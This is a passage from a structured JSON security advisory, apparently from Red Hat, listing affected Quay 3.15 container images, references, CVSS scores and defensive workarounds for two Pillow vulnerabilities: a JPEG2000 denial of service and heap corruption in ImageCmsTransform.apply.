"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59204"
},
{
"category": "external",
"summary": "RHBZ#2500022",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500022"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59204",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59204"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59204",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59204"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/13ada41172142f2fd9f0906f615a00ea623a11ca",
"url": "https://github.com/python-pillow/Pillow/commit/13ada41172142f2fd9f0906f615a00ea623a11ca"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9704",
"url": "https://github.com/python-pillow/Pillow/pull/9704"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-vjc4-5qp5-m44j",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-vjc4-5qp5-m44j"
}
],
"release_date": "2026-07-14T15:38:29.545000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
},
{
"category": "workaround",
"details": "If the application does not need JPEG2000 support, block .jp2, .j2k, .jpf, and .jpx uploads at the input layer.\n\nFor services that do process JPEG2000, set memory limits on the process or container (LimitAS= in systemd, or memory limits in Kubernetes/Podman) so a crafted image can only crash the worker, not the whole host. Add automatic restarts (Restart=always in systemd, or container restart policies) so the service recovers from OOM kills without someone having to intervene.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Denial of Service via crafted JPEG2000 image"
},
{
"cve": "CVE-2026-59205",
"cwe": {
"id": "CWE-843",
"name": "Access of Resource Using Incompatible Type (\u0027Type Confusion\u0027)"
},
"discovery_date": "2026-07-14T17:02:11.367224+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500052"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. This vulnerability allows an attacker to trigger controlled native heap corruption by supplying an output image whose mode does not match the transform\u0027s declared output mode when using the ImageCms.ImageCmsTransform.apply API. This can lead to a denial of service (DoS) condition, making the affected system or application unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Controlled native heap corruption in ImageCms.ImageCmsTransform.apply API",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The impact is limited to denial of service. While the underlying issue is heap corruption via mode mismatch, it does not provide a controlled write primitive exploitable for code execution in affected Red Hat products.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59205"
},
{
"category": "external",
"summary": "RHBZ#2500052",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500052"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59205",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59205"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59205",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59205"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/a9ffc42bedf4fc0a7ef8d6486e7f9e81e3397721",
"url": "https://github.com/python-pillow/Pillow/commit/a9ffc42bedf4fc0a7ef8d6486e7f9e81e3397721"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9715",
"url": "https://github.com/python-pillow/Pillow/pull/9715"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-9hw9-ch79-4vh6",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-9hw9-ch79-4vh6"
}
],
"release_date": "2026-07-14T15:48:39.962000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
},
{
"category": "workaround",
"details": "Most applications using Pillow\u0027s color management via profileToProfile() or applyTransform() are not exposed. Only code that calls ImageCmsTransform.apply() directly with a user-controlled output image whose mode does not match the transform can trigger the heap corruption. Audit your code for direct apply() calls to confirm.\n\nRHEL builds ship with ASLR, full RELRO/PIE, and FORTIFY_SOURCE by default, making escalation from crash to code execution much harder. For DoS containment, configure automatic service restart (Restart=always in systemd, or container restart policies) so the process recovers without manual intervention.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
